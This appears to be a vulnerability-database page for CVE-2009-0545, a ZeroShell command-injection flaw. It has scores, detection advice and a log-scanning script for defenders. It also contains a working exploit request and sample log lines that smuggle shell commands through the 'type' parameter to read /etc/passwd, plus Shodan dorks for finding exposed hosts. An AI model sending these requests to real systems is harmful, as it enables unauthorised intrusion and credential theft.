CVE-2009-0545
Published: 2009-02-12
Priority: P1 80 · Critical 10 (CVSS 2.0) · Exploited in the wild · VulnCheck KEV
EPSS: 90.73% (99.8th percentile)
cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zeroshell | zeroshell | — | — |
Detection & IOCs (extracted from sources)
- Look for unauthenticated GET requests to /cgi-bin/kerbynet with query parameters Section=NoAuthREQ, Action=x509List, and shell metacharacters (semicolons, quotes) in the 'type' parameter — this is the exploitation pattern for CVE-2009-0545.
- Successful exploitation may result in /etc/passwd content (matching root:.*:0:0:) appearing in the HTTP response body — use this as a confirmation matcher.
- The Metasploit module targets the RunScript action post-authentication to execute payloads with root privileges after retrieving the cleartext admin password from /var/register/system/ldap/rootpw via LFI.
- Use Shodan query 'http.title:"zeroshell"', FOFA query 'title="zeroshell"', or Google dork 'intitle:"zeroshell"' to identify exposed ZeroShell instances for proactive scanning.
- The Metasploit module targets ZeroShell 2.0 RC2 and lower, which is a broader scope than the NVD entry (1.0beta11 and earlier) — ensure version targeting is correct for the specific engagement.
- The admin password stored in /var/register/system/ldap/rootpw is in cleartext and is retrievable via the unauthenticated LFI before the RCE stage — defenders should monitor access to this file path.
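Added example (not from any of the sources on this page): the request-side pattern from the first bullet applied to a few constructed access-log lines, plus the /etc/passwd confirmation matcher from the second bullet; the combined log format, source IPs and timestamps are assumed.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Feb/2009:10:01:02 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;id;%22 HTTP/1.1" 200 512
203.0.113.7 - - [12/Feb/2009:10:01:03 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1" 200 2048
198.51.100.4 - - [12/Feb/2009:10:02:00 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=host HTTP/1.1" 200 300
198.51.100.4 - - [12/Feb/2009:10:02:05 +0000] "GET /cgi-bin/kerbynet?Section=Login&Action=Form HTTP/1.1" 200 1200
"""

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')
METACHARS = re.compile(r'[;|&`$"\'\n]')      # characters that break out of the shell argument
PASSWD_RE = re.compile(r'^root:.*:0:0:', re.MULTILINE)  # confirmation matcher from the IOC list

def parse_query(query):
    """Split on '&' only; parse_qs in older Pythons also split on ';' and would hide the injected separator."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote(key), []).append(unquote(value))
    return params

def kerbynet_injection_payload(request_target):
    """Decoded 'type' value when the request matches the CVE-2009-0545 pattern, else None."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/cgi-bin/kerbynet"):
        return None
    params = parse_query(parts.query)
    if params.get("Section") != ["NoAuthREQ"] or params.get("Action") != ["x509List"]:
        return None
    for value in params.get("type", []):
        decoded = unquote(value)  # second pass catches double-encoded payloads
        if METACHARS.search(decoded):
            return decoded
    return None

def scan_access_log(text):
    """Return (source IP, timestamp, decoded payload) for each matching request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        payload = kerbynet_injection_payload(m.group("target")) if m else None
        if payload is not None:
            hits.append((m.group("src"), m.group("ts"), payload))
    return hits

def passwd_leaked(response_body):
    """True when a response body carries an /etc/passwd root entry."""
    return PASSWD_RE.search(response_body) is not None
```

Only the two requests carrying metacharacters in 'type' are reported; the legitimate x509List call and the Login request are not.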
CVSS provenance
- NVD: v2.0 10.0 CRITICAL (AV:N/AC:L/Au:N/C:C/I:C/A:C)
- VulnCheck: 10.0 CRITICAL
GHSA
GHSA-9p53-hww6-pm2p (unreviewed, 2022-05-02) · CVE-2009-0545 [HIGH] CWE-20
cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action.
VulnCheck
zeroshell zeroshell Improper Input Validation
vulncheck · 2009 · CVE-2009-0545 [CRITICAL] CVSS 10.0
cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action.
Affected: zeroshell zeroshell
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
- https://www.akamai.com/blog/security/latest-echobot-26-infection-vectors
- https://www.researchgate.net/publication/348602660_An_analysis_of_the_use_of_CVEs_by_IoT_malware
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-23&host_type=src&vulnerability=cve-2009-0545
- https://dashboard.shadowserver.org/statistics/hone
No detection rules found.
Exploit-DB
ZeroShell 1.0beta11 - Remote Code Execution
exploitdb · 2009-02-09 · CVE-2009-0545
---
In addition to the Unix commands, it is possible to abuse the ZeroShell scripts themselves. For instance, it is possible to use the "getkey" script in order to retrieve remote files, including the content in the html page.
{HTTP REQUEST}
```http
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host:
```
# milw0rm.com [2009-02-09]
Nuclei
ZeroShell <= 1.0beta11 Remote Code Execution
nuclei · CVE-2009-0545 [CRITICAL] CVSS 10.0
ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.
Template:
```yaml
id: CVE-2009-0545

info:
  name: ZeroShell <= 1.0beta11 Remote Code Execution
  author: geeknik
  severity: critical
  description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected system.
  remediation: |
    Upgrade to a patched version of ZeroShell.
  reference:
    - https://www.exploit-db.com/exploits/8
```
Metasploit
ZeroShell Remote Code Execution
metasploit
This module exploits a vulnerability found in ZeroShell 2.0 RC2 and lower. It will leverage an unauthenticated local file inclusion vulnerability in the "/cgi-bin/kerbynet" url. The file retrieved is "/var/register/system/ldap/rootpw". This file contains the admin password in cleartext. The password is used to login as the admin user. After the authentication process is complete it will use the RunScript action to execute the payload with root privileges.
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42 · 2019-12-13
Ruchna Nigam · Threat Research, Malware · Published: December 13, 2019
Tags: Malware, Threat Research, Vulnerabilities, Echobot, IoT, IoT Vulnerability, Mirai, Mirai variant
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploited in the wild until now, ranging from extremely old CVEs from as long back as 2003, to recent vulnerabilities made public as recently as early December 2019. Based on this seemingly odd choice, one could risk a guess that the attackers could potentially be aiming for the sweet sp
Greynoiseio
Malicious Tag Roundup (Jun 21-Jul 16, 2021)
blogs_greynoiseio · CVSS 5.3 [MEDIUM]
Greynoiseio
Malicious Tag Roundup (Jul 19-Aug 2, 2021)
blogs_greynoiseio · CVSS 10.0 [CRITICAL]
References
- http://www.ikkisoft.com/stuff/LC-2009-01.txt
- http://www.securityfocus.com/archive/1/500763/100/0/threaded
- http://www.vupen.com/english/advisories/2009/0385
- http://www.zeroshell.net/eng/announcements/
- http://www.zeroshell.net/eng/patch-details/#C100
- https://www.exploit-db.com/exploits/8023